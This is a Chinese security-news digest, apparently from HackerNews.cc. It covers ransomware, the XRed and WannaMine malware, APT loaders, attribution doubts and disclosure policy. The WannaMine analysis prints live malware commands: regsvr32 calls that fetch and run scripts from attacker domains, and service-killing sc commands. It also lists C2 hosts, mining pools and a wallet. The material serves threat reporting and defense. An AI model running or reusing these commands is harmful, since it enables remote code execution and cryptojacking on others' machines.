分类: 今日推送

美国拉辛市遭勒索软件攻击 多行业网络受影响

1月31日,美国威斯康星州的拉辛市被勒索软件入侵,事件发生后,该市大部分计算机系统瘫痪。 该地政府科技网站发布报告称:本市的计算机网络系统周五被勒索软件入侵,至周日下午网络系统仍处于瘫痪状态。目前,该市的网站、电子邮件以及在线支付系统都收到影响。拉辛警方发布Facebook,称其目前无法支付事件的处理费用,也无法提供事件的侦测报告。 周五,该市的信息管理部门开启了事件响应程序,地方当局以及联邦政府对事件展开调查,调查声称税收以及911公共安全系统未受这次勒索软件入侵影响。 鲍威尔在一份声明中称:MIS worked over the weekend 公司联合网络安全公司制作了一个周密的计划,在不传播勒索软件的情况下恢复网络系统,目前对事件发生原因以及波及范围都在进行调查。 去年12月,Maze勒索软件运营商发布消息,称其利用勒索软件盗取彭萨科拉市的2GB文件。 去年11月,路易斯安那周政府遭到勒索软件攻击,多州的服务机构包括机动车管理局、卫生部以及运输发展部都受到影响。这一事件使得路易斯安那州关闭了该州的几个网站以及邮件和互联网服务。 8月份,近23个地方政府遭受勒索软件攻击,佛罗里达州的一些城市也受到黑客影响。去年6月,佛罗里达州被勒索软件攻击系统,里维埃拉海滩城同意支付60万美元的赎金来解密其数据。几天后,莱克城也同意支付近50万美元的赎金机密遭勒索软件攻击系统。   消息来源:securityaffairs, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

节日期间某企业远程办公遭遇 XRed 病毒攻击

感谢腾讯御见威胁情报中心来稿! 原文:https://s.tencent.com/research/report/880.html 腾讯企业安全应急响应中心(下称腾讯安全)接到某互联网公司求助,该公司一位业务主管分享到内部工作群的远程办公工具及电子表格文件被发现感染病毒,导致部门200多名员工电脑被感染,该公司担心系统业务安全受到威胁。 一、概述 受疫情影响,多个省市延长春节假期,一些企事业单位、互联网公司或推迟开工日期,或全员进行远程办公,一部分员工使用个人电脑临时替代工作电脑,增加了企业被感染的风险。 近日,腾讯企业安全应急响应中心(下称腾讯安全)接到某互联网公司求助,该公司一位业务主管分享到内部工作群的远程办公工具及电子表格文件被发现感染病毒,导致部门200多名员工电脑被感染,该公司担心系统业务安全受到威胁,希望腾讯安全协助处理。 接到求助后,腾讯安全工程师和该公司密切配合,快速梳理了相关信息,通过溯源发现是该企业在进行远程办公时,某位业务主管使用个人电脑办公,该电脑被XRed病毒感染,致使电脑EXE文件及电子表格文件均被病毒感染,通过内部工作群分享远程办公工具之后,造成该病毒在同事间扩散。 通过分析,腾讯安全专家发现XRed病毒是具备远程控制、信息窃取能力的感染型病毒,可以感染本地EXE文件及xlsx电子表格文件,病毒可通过文件分享和U盘、移动硬盘等媒介传播。 该企业因发现比较及时,使用腾讯电脑管家或腾讯T-sec终端安全管理系统清除病毒后,已完美恢复被感染的文件,本次病毒攻击未对该企业造成重大影响。 二、病毒感染源排查 1.该公司前期内部排查:公司网管注意到某员工通过内部工作群分享的压缩包中远程办公工具exe文件被感染,而公司统一提供的远程办公工具exe则为正常文件。因此基本确认病毒传播源头。 2.腾讯安全工程师对此进行了远程排查,发现怀疑感染病毒的电脑有如下现象: (1)在该电脑上解压文件,发现解压出来的exe文件对比原始文件大,已被感染 (2)任意复制一个exe文件放到桌面上,exe文件都会被感染,感染后文件描述被修改成触摸板设备驱动程序,据此可以基本确认该病毒为同行已披露过的“Synaptics”蠕虫病毒。 (3)继续检查发现,这台中毒电脑上破解版压缩软件并未发现“供应链污染”类问题。基本可以确认是这台个人电脑更早前某个时刻感染XRed病毒,在本次应急用作工作电脑远程办公使用,对外分享文件时,被该公司IT人员监测发现异常。 三、阻断病毒传播和修复方案 该公司IT人员立即对感染病毒的机器进行断网处理,避免进一步扩散。 在确认电脑管家云主防可以拦截病原体“Synaptics.exe”之后,立即要求未安装“腾讯T-sec终端安全管理系统”的电脑安装腾讯电脑管家。病原体“Synaptics.exe”有超过2万个变种,最近一次更新是2020年1月,目前仍处于活跃状态,建议企业及时升级杀毒软件,做好防范。 对已感染病毒对电脑,使用腾讯电脑管家(或腾讯T-sec终端安全管理系统)进行全盘查杀修复被感染的文件。XRed病毒感染方式相对比较特殊(详情可参见后续“样本详细分析”部分),腾讯电脑管家可以准确识别和完美修复,将被感染文件还原成原始状态。 四、样本详细分析 根据该病毒在写入的日志信息以及Gmail用户名的关键词,将该感染型病毒名确定为“XRed”。XRed病毒最近四个月较为活跃,有一定增长态势。 该病毒通过感染指定位置的32位的“.exe”后缀文件与“.xlsx”后缀文件,使其恶意代码可以通过文件共享大量传播但不会导致系统明显卡顿。 如下三个指定的感染位置: %USERPROFILE%\Desktop %USERPROFILE%\Documents %USERPROFILE%\Downloads 被感染的文件被执行时,会执行恶意逻辑,包括释放伪装名为“Synaptics.exe”的文件常驻系统,进行远程控制,回传窃取的敏感信息等恶意行为。 主要功能逻辑如下图所示: 被感染的可执行文件体积增量约为753KB,包含一个名为“EXERESX”的资源,该资源是原始正常的程序。被感染的文件资源如下图所示。 EXERESX”资源会在宿主文件运行时被释放到当前目录并设置隐藏属性后执行。添加“ ._cache_”前缀拼接文件名,如下图所示。 该病毒释放并加载名为“KBHKS”的动态库资源,通过设置相关钩子消息以记录键盘输入信息及其窗口信息等, Hook代码关键逻辑如下: 病毒使用“XLSM”资源感染xlsx后缀文件,并将“.xlsx”后缀改为“.xlsm”。修改office组件设置以及xlsm后缀目的为了能够自动静默启用宏。 “XLSM”资源包含了恶意VBA脚本,恶意功能如下: 篡改Word和Excel组件的宏设置,启用所有宏。 通过公有云盘下载并执行Synaptics.exe病毒。 键盘记录特殊虚拟键码转换如下图所示 用于回传敏感信息的邮箱账密、配置与病毒本体的更新链接等硬编码配置如下图所示: 具有基础的远程控制功能,包括执行CMD命令、屏幕截图、打印目录、下载文件、删除文件等。功能代码如下图所示: 远控功能 IOCs: md5 13358cfb6040fd4b2dba262f209464de C2 & URL xred.mooo.com freedns.afraid.org/api/?action=getdyndns&sha=a30fa9*****797bcc613562978 hxxps://docs.google.com/uc?id=0BxsM*****aHFYVkQxeFk&export=download hxxps://www.dropbox.com/s/zh*****hwylq/Synaptics.rar?dl=1 hxxp://xred.site50.net/syn/*****.rar 病毒作者邮箱地址 xredline1@gmail.com xredline2@gmail.com xredline3@gmail.com 参考资料: https://www.freebuf.com/articles/terminal/222991.html

伪装为 WAV 的恶意软件在受害设备上挖矿 但其 bug 导致 BSOD

Guardicore的安全研究人员揭示了一种复杂的恶意软件攻击,该攻击成功地破坏了属于医疗技术行业中型公司的800多种设备。恶意软件伪装成WAV文件,并包含一个Monero挖矿软件,它利用臭名昭著的EternalBlue漏洞来危害网络中的设备。 这款恶意软件唯一的bug,是最终导致受感染的电脑蓝屏死亡(BSOD),并且显示相关错误代码,最终引起受害者怀疑,并引发对事件的深入调查。 研究人员表示,BSOD于10月14日首次发现,当时发生致命崩溃的机器正在尝试执行长命令行(实际上是基于base-64编码的PowerShell脚本)。对脚本进行解码后,研究人员获得了可读的Powershell脚本,该脚本用于部署恶意软件。该脚本首先检查系统架构(基于指针大小)。然后,它读取存储在上述注册表子项中的值,并使用Windows API函数WriteProcessMemory将该值加载到内存中。研究人员指出,恶意软件负载通过获取和调用函数指针委托来执行。 该恶意软件尝试使用基于EternalBlue的漏洞传播到网络中的其他设备,该漏洞与WannaCry于2017年使用的漏洞相同,感染了全球数千台电脑。在对恶意软件进行反向工程之后,研究人员发现该恶意软件实际上隐藏了伪装成WAV文件的Monero挖矿模块,使用CryptonightR算法来挖掘Monero虚拟货币。此外,该恶意软件利用隐写术并将其恶意模块隐藏在外观清晰的WAV文件中。” 研究人员发现,完全删除恶意软件(包括终止恶意进程)阻止了在受害设备上发生BSOD。   (稿源:cnBeta,封面源自网络。)

外媒评俄罗斯攻击 Burisma 一事:证据不完全可靠

据外媒报道,2016年美国民主党全国委员会灾难性的黑客攻击给所有担心国际混乱竞选的人敲响了警钟。当地时间周一晚,美国人又有了一个担心2020年大选的新理由。《纽约时报》和网络安全公司Area1报道了俄罗斯情报机构针对乌克兰天然气公司Burisma发起的新一轮黑客攻击。 几个月来,共和党方面一直在暗示该公司内部存在一些可怕的腐败行为,如果俄罗斯间谍真的侵入了这家公司的网络那么可能就会带来非常可怕的后果。 一些国会议员则已经在预测2016年大选将会重演,民主党众议员Adam Schiff评论道:“看起来他们又想帮助这位总统(特朗普)。这是一个令人担忧的想法,考虑到特朗普上次拒绝承认俄罗斯的黑客行为,没有迹象表明白宫会采取任何措施来阻止它。” 尽管报告描绘了一幅可怕的画面,但证据并不像看上去那么确凿。虽然已经有强有力的证据表明Burisma成功地成为了网络钓鱼活动的目标,但很难确定是谁在背后支持这个活动。确实有迹象表明,俄罗斯的GRU情报机构可能参与其中,但证据大多是间接的。 据了解,大部分证据都在一份跟《纽约时报》文章一起发布的八页报告中。核心证据是以前针对Hudson Institute和George Soros的攻击模式。最糟糕的是,这些钓鱼活动都使用了相同的SSL供应商和相同URL的不同版本然后伪装成一个名为“My Sharepoint”的服务。在Area1看来,这是GRU的战术,Burisma只是众多目标中最新的一个。 但并不是所有人都认为基于域名属性的推断就是十拿九稳的。当Kyle Ehmke检查ThreatConnect相同模式的早期迭代时,他得出了一个更为慎重的结论,即“适度自信”地评估这些域名跟APT28有关–APT28是俄罗斯GRU的缩写。“我们看到了一致性,但在某些情况下,这些一致性并不适用于单个演员,”Ehmke告诉TheVerge。这种注册和网络钓鱼攻击的模式确实像是GRU的剧本,但它不是唯一的剧本也不是其利用的唯一剧本。 实际上,这意味着网络运营商应该在任何时候发现符合这种情况的攻击时发出警报,但要对单个事件做出明确的裁决就显得困难得多。竞选活动中使用的网络基础设施都是公开的,而且还被其他很多政党使用,所以这些都不能算是确凿的证据。而最显著的特征是术语“sharepoint”,研究人员只在跟GRU紧密相连的url中看到过这个词。但任何人都可以注册一个带有“sharepoint”的URL,所以这种连接只是间接的。 Ehmke指出:“这是一组值得注意的一致性,它可以用来寻找和识别他们的基础设施。但这并不是说所有具有这些一致性的东西都已经是而且将会是APT28。” 在缺乏一个特定机构的战略和目标的具体信息的情况下很难做出更强的归因。走向相反的方向–从一个弱归因到一个意图的假设–可能是危险的。 令人沮丧的是,这种弱归因在网络安全世界中非常常见,当各国努力搞清楚网络战的国际外交时它可能会引发真正的问题。乔治亚理工学院Internet Governance Project前执行董事Farzaneh Badii把原因不明归为“可以在技术上受到质疑的间接证据”。她认为这是一个全球性的问题,并主张成立国际归因小组来解决这种僵局,这样观察员就不必依赖私营公司或政府情报机构。如果没有这个信任问题就很难解决。   (稿源:cnBeta,封面源自网络。)

安全公司发现俄黑客成功入侵 Burisma 网络:或对美大选产生干扰

据《纽约时报》报道,硅谷一家名为Area1的安全公司表示,他们发现有迹象表明,由国家资助的俄罗斯黑客成功入侵了乌克兰天然气公司Burisma。该公司在美国政治中扮演了核心角色,因为它跟民主党总统候选人领跑者约瑟夫·拜登关系密切。拜登的儿子亨特则是该公司的董事。 约瑟夫·拜登资料图 今年7月,特朗普总统要求乌克兰政府调查Burisma事件以找出有关拜登家族的破坏性信息。据称,特朗普曾威胁称,如果乌克兰总理不宣布展开调查,他将停止对乌克兰的军事援助。这一要求是总统正在进行的弹劾程序的核心,这也使得Burisma成为任何试图干涉美国政治的人的诱人目标。 而据安全公司Area1披露,他们发现了发送给Burisma员工的钓鱼邮件,这些邮件带有GRU黑客活动的许多特征。这些黑客显然成功获取了员工的登录信息,不过目前还不清楚他们究竟获取了多少信息。如果GRU真的有参与其中,那么该组织可能会在2020年总统大选期间曝出令人尴尬的信息。 据了解,在攻击Burisma的过程中,俄罗斯黑客可能采取了跟2016年大选期间其破坏希拉里·克林顿总统竞选活动类似的手段。   (稿源:cnBeta,封面源自网络。)  

50 多家组织致信谷歌:允许用户卸载所有 Android 预装应用程序

包括国际隐私组织、数字权利基金会,DuckDuckGo和电子前沿基金会在内的50多个组织,近日向Alphabet和Google首席执行官Sundar Pichai发出公开信,就Android设备预装软件所存在的漏洞以及它们如何给消费者带来隐私风险表明了自己的立场。 在这封公开信中,这些组织表示所有Android OEM厂商都在其设备上预装了无法删除的应用程序,并且具备厂商定值的特殊权限,因此可以绕过Android的权限模型。 这使的这些预装应用程序可以在没有用户干预的情况下,就能访问麦克风、摄像头、定位以及其他权限。这也导致很多智能手机OEM厂商可以在没有征得用户明确许可的情况下收集用户数据,并用于其他利益。 因此,这些组织希望谷歌对Android预装应用程序(Bloatware)采取一些调整,并希望公司能够为用户提供永久卸载设备上所有预装应用程序的功能。虽然可以在Android设备上禁用某些预加载的应用程序,但它们仍会继续运行某些后台进程,这使得禁用它们成为一个争论的焦点。 公开信中要求确保所有预装应用程序能够和常规应用程序一样罗列在Google Play应用商城中,并进行相同的审查。他们还希望即使设备没有用户登录,也可以通过Google Play更新所有预安装的应用。如果Google检测到OEM试图利用用户的隐私及其数据,则出于隐私和保护用户数据方面的考量拒绝认证该设备。 Google在Android 10中进行了许多针对隐私的更改,但仍有很多地方可以进行完善,帮助用户免受预装应用程序的侵害。   (稿源:cnBeta,封面源自网络。)

谷歌 Project Zero 团队宣布新政策 漏洞披露前将有完整的90天缓冲期

谷歌 Project Zero 团队以披露大量严重漏洞而被人们所熟知,但也因为严格的快速披露政策而遭到了行业内的批评。于是 2020 年的时候,谷歌安全团队试图制定新的政策,将问题披露的宽限期给足了整整 90 天。即便如此,谷歌还是对过去五年的政策表现感到满意,指出有 97.9% 的漏洞报告在当前的 90 天披露政策下得到了有效的修复。 相比之下,2014 年有些 bug 拖了六个月、甚至更长的时间来解决。不过在审查了“复杂且经常引起争议”的漏洞披露政策之后,谷歌还是决定在 2020 年做出一些改变。 那些易被曝光漏洞的企业,将被给予默认 90 天的缓冲时间,而无论其将于何时修复相关 bug 。若企业顺利或提前完成了修复,也可以与谷歌 Project Zero 取得联系,以提前公布漏洞详情。 ● 厂家在 20 天内修复了 bug?谷歌将在第90天公布漏洞详情; ● 厂家在 90 天内修复了 bug?谷歌也将在第 90 天公布漏洞详情! 当然,在争取推动“更快的补丁开发”流程的同时,Project Zero 还希望全面提升补丁程序的采用率。 现有政策下,谷歌希望供应商能够快速开发补丁,并制定适当的流程,以将之交付给最终客户,我们将继续紧迫地追求这一点。 然而有太多次,供应商只是简单的记录了漏洞,而不考修改或从根本上修复已曝光的漏洞。有鉴于此,Project Zero 团队希望推动更快的补丁开发,以防别有用心者轻易地向用户发动大大小小的攻击。 改进后的新政策指出,发现漏洞之后,最终用户的安全性不会就此得到改善,直到 bug 得到适当的修复。只有最终用户意识到相关 bug,并在他们的设备上实施了修补,才能够从漏洞修复中得到益处。 最后,在新政策转入“长期实施”之前,Google 将给予 12 个月的试用。   (稿源:cnBeta,封面源自网络。)

挖矿资源争夺加剧,WannaMine 多种手法驱赶竞争者

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/GGD563kHbxrvt-XRitjUbQ 一、背景 腾讯安全御见威胁情报中心检测到WannaMine挖矿僵尸网络再度更新,WannaMine最早于2017年底被发现,主要采用Powershell“无文件”攻击组成挖矿僵尸网络。更新后的WannaMine具有更强的传播性,会采用多种手法清理、阻止竞争木马的挖矿行为,同时安装远控木马完全控制中毒系统。 本次更新后的WannaMine病毒具有以下特点: 利用“永恒之蓝”漏洞攻击传播; 利用mimiktaz抓取域登录密码结合WMI的远程执行功能在内网横向移动; 通过添加IP策略阻止本机连接对手木马的47个矿池,阻止其他病毒通过“永恒之蓝”漏洞入侵; 添加计划任务,WMI事件消费者进行持久化攻击,删除“MyKings”病毒的WMI后门; 利用COM组件注册程序regsvr32执行恶意脚本; 利用WMIClass存取恶意代码; 在感染机器下载Gh0st远控木马conhernece.exe和门罗币挖矿木马steam.exe。 二、详细分析 WannaMine安装计划任务进行持久化,计划任务名:’Microsoft\Windows\MUI\LMRemove’, ‘Microsoft\Windows\Multimedia\SystemEventService’,执行以下命令: regsvr32 /u /s /i:http://safe.lxb.monster/networks.xsl scrobj.dll regsvr32 /u /s /i:http://skt.xiaojiji.nl/networks.xsl scrobj.dll Regsvr32.exe是一个命令行程序,用于在Windows系统上注册和注销对象链接和嵌入控件,包括动态链接库(DLL),Regsvr32.exe可用于执行任意二进制文件。由于regsvr32.exe支持网络代理,因此可以通过在调用期间将统一资源定位符(URL)作为参数传递外部Web服务器上的文件来加载脚本。 在计划任务执行时,恶意脚本networks.xsl被Regsvr32.exe执行。networks.xsl实际上使用XML语言描述,其中被嵌入了一段JScript脚本,功能为通过CMD命令执行一段加密的Powershell代码。 两段Powershell代码解码后如下: 分别从http[:]//skt.xiaojiji.nl/networks.ps1和 http[:]//safe.dashabi.nl/networks.ps1下载得到文件networks.ps1。networks.ps1经过加密的Powershell脚本,也是是核心攻击代码。代码首先中定义了三个变量$miiiiii ,$fffffff,$ssssssss来分别保存加密数据,然后继续执行,后续代码中会读取并解密变量中的数据。 变量之后的代码以字符“&( $VerBOsepreFErEnce.ToSTrinG()[1,3]+’X’-joiN”)“开头,这段字符在Powershell的混淆代码中较为常见,功能等同于Powershell命令中的“IEX”(Invoke-Expression),IEX用于将字符串作为命令执行,当去掉IEX后,执行后就会显示原本的字符串。 我们将这段字符替换为自定义输出命令“write-host”,即可得到解码后的Powershell代码。 核心Powershell删除竞争对手安装的WMI后门代码,包括属于MyKings僵尸网络的“fuckyoumm3” ,“fuckyoumm4”,”fuckyoumm”,“fuckamm3”后门,以及属于未知团伙的“BotFilter82“,“BotConsumer23”,” BotFilter82”后门。 然后通过以下代码安装WMI事件消费者,其中事件过滤器名$filterName = (‘Windows Events Filter’),事件消费者名$consumerName = (‘Windows Events Consumer’)。当捕获到指定的事件发生时执行恶意代码”$EncodedScript”,达到持久化攻击的目的。 对比2019年4月WannaMine代码可以发现基础设施已发生变化: 旧版: 备用服务器地址:profetestruec.net、45.199.154.108、172.247.116.87 默认下载地址:172.247.116.8 默认端口:8000 核心Powershell:in6.ps1,in3.ps1 新版: 备用服务器地址:safe.dashabi.nl、45.77.148.102、skt.xiaojiji.nl 默认下载地址:skt.xiaojiji.nl 默认端口:80 核心Powershell:network.ps1 申请一个名为“root\default:System_Anti_Virus_Core “的WMI对象,将变量中的数据保存到WMIClass当中以备后续使用。 接着从变量$fffffff中获取代码$defun执行。 $defun中函数Download_file()负责下载文件并保持到temp目录下。 RunDDOS()负责启动DDOS进程。 RunXMR()负责启动门罗币挖矿进程。 KillBot()负责清除竞争对手,杀死进程命令行包含字符“System_Anti_Virus_Core “,”cryptonight “的进程,同时杀死使用端口3333、5555、7777进行TCP通信的进程。 实现了“永恒之蓝“漏洞攻击代码,攻击函数为eb7()、eb8()。、 Get-IpInB()函数从网卡配置信息中获取IP地址,取A段和B段作为IP地址开头,然后随机生成C段和D段组成待攻击的IP地址列表。 在Test-Port()中测试IP地址是否开放445端口,在Get-creds()中通过密码抓取工具mimiktaz获取当前域登录密码,得到Username、Domain、Password/NTLM数据并保存。 密码搜集工具mimiktaz由初始阶段定义的三个变量之一的$miiiiii解密获得。在Test-ip()中针对mimiktaz获取到域登录凭证的IP进行攻击,利用WMI的远程命令执行功能,调用Invoke-WmiMethod执行远程Powershell命令(64位执行 http[:]//safe.dashabi.nl/networks.ps1,32位执行http[:]//safe.dashabi.nl/netstat.ps1)。 核心Powershell利用“永恒之蓝“漏洞攻击工具进行攻击。首先调用[PingCastle.Scanners.m17sc]::Scan()进行漏洞扫描,将存在漏洞的IP保存至$i17中,然后调用攻击函数eb7()和eb8()进行攻击。 在目标系统执行shellcode命令$sc,该命令内容由之前的三个变量之一$ssssssss中解密得到,主要功能为判断WMI中是否存在root\Subscription -Class __FilterToConsumerBinding命名空间下的null对象或者不含“Windows Events Filter“字符的对象,如果是则执行远程恶意代码:http[:]//207.246.124.125/networks.ps1 RunDDOS(Gh0st远控木马) Networks.ps1中解码出$fffffff后,调用其函数RunDDOS ,指定参数”cohernece.exe”,从http[:]//safe.dashabi.nl/coherence.txt下载二进制数据,并还原成PE文件cohernece.exe到%Temp%目录下,通过start-process命令执行。 分析发现,该文件当前并非DDOS木马,而是Gh0st远控木马,当前使用的C&C地址为six.lxb.monster:8447。 Gh0st远控木马较为常见,技术分析从略。 RunXMR Networks.ps1中解码出$fffffff后,调用其函数RunXMR,指定参数”steam.exe”,从http[:]//safe.dashabi.nl/steam.txt下载二进制数据,并还原成PE文件steam.exe到%Temp%目录下,通过start-process命令执行。steam.exe为自解压程序,解压目录为c:\windows\fonts\Wbems\,解压结束后首先执行bat脚本c:\windows\fonts\Wbems\1.bat。 再次删除竞争对手的服务: sc stop “evemt windows” sc delete “evemt windows” sc stop “event log” sc delete “event log” sc stop ias sc delete ias sc stop FastUserSwitchingCompatibility sc delete FastUserSwitchingCompatibility sc stop MicrosoftMysql sc delete MicrosoftMysql 设置解压目录下的木马文件为隐藏、系统属性: attrib -a -s -h c:\windows\fonts\Wbems\*.exe 启动c:\windows\fonts\Wbems\ipp.exe,该文件也是Gh0st远控木马。 将解压出的病毒文件拷贝到目标目录下 netsh ipsec static importpolicy file=c:\windows\fonts\Wbems\close.ipsec,将木马释放的IP安全策略文件close.ipsec导入到当前机器。 close.ipsec通过配置IP筛选器,阻止本机向其他47个矿池IP地址发起的TCP网络连接,从而阻止竞品木马的挖矿行为。 阻止任何地址与本机的139/445端口的TCP或UDP通信,包括局域网和远程连接,从而阻止其他病毒通过“永恒之蓝”漏洞入侵。 通过SetACL.exe修复注册表”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator”的访问属性,并在该注册表下写入StartExe值,利用微软”The Ease of Access Center”(便捷访问中心)特性来启动木马uas.exe。 然后通过服务管理程序msdtc,将挖矿木马xx.exe安装为服务”Event Logs”并启动服务。设置服务的DisplayName和Description值如下: DisplayName “USO Services” Description “Manages profiles and accounts on a SharedPC configured device” 挖矿程序xx.exe采用XMRig 5.4.0版本编译,支持CPU和NVIDIA CUDA显卡GPU挖矿(4.5.0以后)。 使用以下矿池: xmr.wulifang.nl:80 91.121.140.167:443 hash.wulifang.nl:80 131.153.76.130:443 xme.wulifang.nl:13531 47.101.30.124:13531 fr.minexmr.com:80 钱包: 44AVCF3zFkWLKYrXQ7A2L4MjWxhJNxzZZczD8N9LjEbE9PCwdjRg1iJ4oHedTxngSVKKV8H74ZDXgHoq9Wgt3cVkJn3eNbS 三、安全建议 根据该病毒的技术特点,我们建议企业采取以下措施加以防范: 使用安全的密码策略,切勿使用弱口令; 及时修复Windows系统漏洞,推荐使用腾讯御点、腾讯电脑管家、或Windows Update修补漏洞,亦可参考以下链接重点修复永恒之蓝相关漏洞;(1)MS17-010永恒之蓝漏洞补丁下载地址:(2)XP、WindowsServer2003、win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598(3)Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的指定IP连接登陆; 对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器; 当系统出现异常时,检查计划任务和WMI(可用WMITools.exe)中是否有存在可疑脚本命令 推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 45.77.148.102 207.246.124.125 Domain safe.dashabi.nl safe.lxb.monster six.lxb.monster skt.xiaojiji.nl URL http[:]//safe.lxb.monster/networks.xsl http[:]//skt.xiaojiji.nl/networks.xsl http[:]//skt.xiaojiji.nl/networks.ps1 http[:]//safe.dashabi.nl/networks.ps1 http[:]//safe.dashabi.nl/netstat.ps1 http[:]//207.246.124.125/networks.ps1 http[:]//safe.dashabi.nl/coherence.txt http[:]//safe.dashabi.nl/steam.txt 参考链接: WannaMine挖矿木马更新基础设施 新手法已大赚17万 WannaMine挖矿木马再活跃,14万台linux系统受攻击

新发现!FIN7 的新型装载程序应用在 Carbanak 后门

专家们发现了一种被FIN7网络犯罪集团称为BIOLOAD的新型加载程序,该程序被用在Carbanak 后门作为新变化的释放器。 Fortinet EnSilo的研究人员发现,被称为BIOLOAD的新型的装载程序与FIN7黑客组织有关联。 Fin7黑客组织自2015年末开始活跃,活动目标是窃取全球范围内的企业支付卡信息,目前疑似已经袭击了100多家美国公司,袭击领域主要集中在其在餐饮、酒店和工业等行业。2018年8月,臭名昭著的FIN7网络犯罪集团三名犯罪人员被起诉,并受到网络欺诈、黑客入侵、盗取身份密码等行为的指控。 此外,BIOLOAD加载程序与BOOSTWRITE加载程序还存在极大的关联。 从相似角度看,BOOSTWRITE也是一个与FIN7组织相关联的加载程序,它也能够将恶意软件直接放入内存,但BIOLOAD通过二进制植入技术,采用dll的劫持方法,将恶意代码加载到合法程序中。 在研究过程中,Fortinet EnSilo的研究人员在FaceFodUninstaller.exe二进制文件中发现了一个恶意的动态链接库,这个链接库从windows 10 1803中开始清理安装Windows OS.此外,研究人员还发现黑客们在DLL“Winbio”所在的“\ System32 \ WinBioPlugIns”文件夹中被植入了恶意的WinBio.dll。 从不同角度看,BIOLOAD装载机样本于分别2019年3月和7月进行了编制,而BOOSTWRITE样本于5月编制。在加载器上,BIOLOAD不支持多个有效载荷,而使用XOR来解密有效载荷,并不是ChaCha密码。在秘钥连接上,BIOLOAD从受害者的名字中获得解密密钥而不是连接远程服务器来获取解密密钥。 2019年1月至4月的时间戳显示,BIOLOAD加载器主要被用来进行程序攻击,并进行Carbank病毒传输。专家发现,这些新的Carbank 病毒样本在对受感染的机器运行上针对防病毒解决方案检查相比以往会更多。而根据针对恶意软件攻击观察的TTPs分析表明:BIOLOAD是由FIN7网络犯罪集团开发的,很可能是BOOSTWRITE的前身。 Fortinet因此得出结论:“这是第一起FaceFodUninstaller.exe被威胁行为者滥用的主体案件,Fin7拥有最新工具的共享代码库,以及同样的技术和后门,导致了因加载程序而引发网络犯罪。时间戳以及更简单的功能表明BIOLOAD是在BOOSTWRITE基础上的更新。” Fortinet建议:由于加载程序是专门为每台目标计算机构建的,需要管理权限才能部署,因此建议相关部门要注意收集有关目标网络的信息。   消息来源:securityaffairs, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文

OilRig 伊朗威胁组织伪装合法的思科工具 安装 Poison Frog 后门

臭名昭著的OilRig伊朗威胁组织通过使用各种PowerShell脚本将恶意软件伪装成合法的Cisco AnyConnect应用程序,以安装Poison Frog后门程序。 Poison Frog是OilRig集团武器库中最强大的后门之一,它包含一个面板,面板上有服务器端部件和PowerShell中曾用于各种备受关注网络攻击的Payload。 卡巴斯基研究人员还发现了一个新样本,它是一个用C语言编写的PE可执行文件,只有删除包含后门Powershell脚本的功能。在同样的逻辑下,还发现了另一个PowerShell脚本,它有两个不同的长字符串,包含DNS和HTTP后门也就是Poison Frog后门。 为了安装恶意软件,OilRig威胁组织成员还巧妙使用了计俩,将恶意软件伪装成合法的Cisco AnyConnect应用程序。 卡巴斯基研究人员发表报告称“信息弹出窗口会在每次点击时出现,起到欺瞒用户的作用,使用户误认为是应用程序或互联网的接入有问题,而实际上却是在悄悄的将后门安装在系统上。”   消息来源:gbhackers, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文